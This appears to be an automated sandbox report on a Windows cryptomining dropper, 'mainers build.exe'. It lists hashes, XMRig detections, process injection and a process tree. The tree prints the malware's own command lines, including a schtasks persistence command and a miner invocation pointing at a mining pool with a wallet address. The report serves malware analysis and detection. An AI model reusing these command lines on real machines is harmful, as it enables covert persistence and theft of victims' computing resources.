Resubmissions
26-06-2024 00:09
240626-afk9qsvdlm 1026-06-2024 00:08
240626-afcmlavdkq 1026-06-2024 00:07
240626-aejdrasbpd 1026-06-2024 00:07
240626-aec7qssbnf 1026-06-2024 00:06
240626-ad5wcssbmg 1026-06-2024 00:06
240626-adxvravcml 1026-06-2024 00:04
240626-acvn1asaqh 1026-06-2024 00:04
240626-ackh2asape 1026-06-2024 00:03
240626-ab5sksvblp 10Analysis
-
max time kernel
2688s -
max time network
2700s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-06-2024 00:08
Static task
static1
Behavioral task
behavioral1
Sample
mainers build.exe
Resource
win11-20240611-en
Behavioral task
behavioral2
Sample
mainers build.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
mainers build.exe
Resource
win10-20240404-en
Behavioral task
behavioral4
Sample
mainers build.exe
Resource
win10v2004-20240611-en
General
-
Target
mainers build.exe
-
Size
29.7MB
-
MD5
b93dd3965c81ec30c91ac4b16d56a7b5
-
SHA1
6061c84646ce64812a87753ecbd96681e29bfb2c
-
SHA256
b46117fca9eb151c97c18031bcbef64049c3f01ab0f27c3b1126dc3b00bdf89e
-
SHA512
cbe3ecf658c4c117a5d40b5f748e4b452ac756acf5d848cfb997747947b50b55a13986bda28b7a96b31932af70ebe00caa1daefb3a1c42b37a46048a0417190e
-
SSDEEP
786432:dQm2AnqisnglHxrW4jZ+cjyDmBOuOtkQupv6RN:eaqi0iHxq4tjysOtBr
Malware Config
Signatures
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/2336-26-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-28-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-31-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-33-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-32-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-30-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-34-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-37-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-38-0x0000000140000000-0x0000000140786000-memory.dmp xmrig behavioral1/memory/2336-39-0x0000000140000000-0x0000000140786000-memory.dmp xmrig -
Executes dropped EXE 2 IoCs
pid Process 4600 services64.exe 4204 sihost64.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5052 set thread context of 2336 5052 conhost.exe 88 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5004 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2328 conhost.exe 5052 conhost.exe 5052 conhost.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2328 conhost.exe Token: SeDebugPrivilege 5052 conhost.exe Token: SeLockMemoryPrivilege 2336 explorer.exe Token: SeLockMemoryPrivilege 2336 explorer.exe -
Suspicious use of WriteProcessMemory 34 IoCs
description pid Process procid_target PID 4888 wrote to memory of 2328 4888 mainers build.exe 78 PID 4888 wrote to memory of 2328 4888 mainers build.exe 78 PID 4888 wrote to memory of 2328 4888 mainers build.exe 78 PID 2328 wrote to memory of 2072 2328 conhost.exe 80 PID 2328 wrote to memory of 2072 2328 conhost.exe 80 PID 2072 wrote to memory of 5004 2072 cmd.exe 82 PID 2072 wrote to memory of 5004 2072 cmd.exe 82 PID 2328 wrote to memory of 4128 2328 conhost.exe 83 PID 2328 wrote to memory of 4128 2328 conhost.exe 83 PID 4128 wrote to memory of 4600 4128 cmd.exe 85 PID 4128 wrote to memory of 4600 4128 cmd.exe 85 PID 4600 wrote to memory of 5052 4600 services64.exe 86 PID 4600 wrote to memory of 5052 4600 services64.exe 86 PID 4600 wrote to memory of 5052 4600 services64.exe 86 PID 5052 wrote to memory of 4204 5052 conhost.exe 87 PID 5052 wrote to memory of 4204 5052 conhost.exe 87 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 5052 wrote to memory of 2336 5052 conhost.exe 88 PID 4204 wrote to memory of 2028 4204 sihost64.exe 89 PID 4204 wrote to memory of 2028 4204 sihost64.exe 89 PID 4204 wrote to memory of 2028 4204 sihost64.exe 89 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\mainers build.exe"C:\Users\Admin\AppData\Local\Temp\mainers build.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\mainers build.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2072 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"4⤵
- Scheduled Task/Job: Scheduled Task
PID:5004
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4128 -
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4600 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052 -
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"7⤵PID:2028
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=49uDLq2aoTjRxqrxdYYZG8A3ZGcLbH2E3BdwpD5UASiEhBnSZ7ERBhqJ768MaBCEGb2tQRCy4m37PEzTjW1MjNF3GEecTzC --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=2 --cinit-idle-cpu=80 --tls6⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
646B
MD577c55532f6106f9f01c86aac8ad7d486
SHA16083606a4db53d5b82f62441b749be6c7812d15a
SHA256ffc096d92c2eaddfcfd323d54f3e1f6e916d05db3d0402ec28548cdf35ad6e8d
SHA512dcb680b4205411eee8aadf3f9fbaf4aeea0e2a5216e4812abf96c9f71a19805088e5dd3adf784a66ad6ca0989279da405920e3c1e82b9fb4d12dae1762ebeb8e
-
Filesize
31KB
MD5523b0b07998159ef63cae05147cda63a
SHA1382de578dbff037b4331829c9347222e409e026e
SHA256354628b91439e1bdb39992e6c24796312da01fd833e27466f1c2270bcb3acb1e
SHA512091126ab76a059c2d3b5084112e4c85eb8250e045b6cfee0ea8b47d01b4222a43138e003b8b9504734960f175281b138db4bb44668eae35bfa7270d417a5a7db
-
Filesize
29.7MB
MD5b93dd3965c81ec30c91ac4b16d56a7b5
SHA16061c84646ce64812a87753ecbd96681e29bfb2c
SHA256b46117fca9eb151c97c18031bcbef64049c3f01ab0f27c3b1126dc3b00bdf89e
SHA512cbe3ecf658c4c117a5d40b5f748e4b452ac756acf5d848cfb997747947b50b55a13986bda28b7a96b31932af70ebe00caa1daefb3a1c42b37a46048a0417190e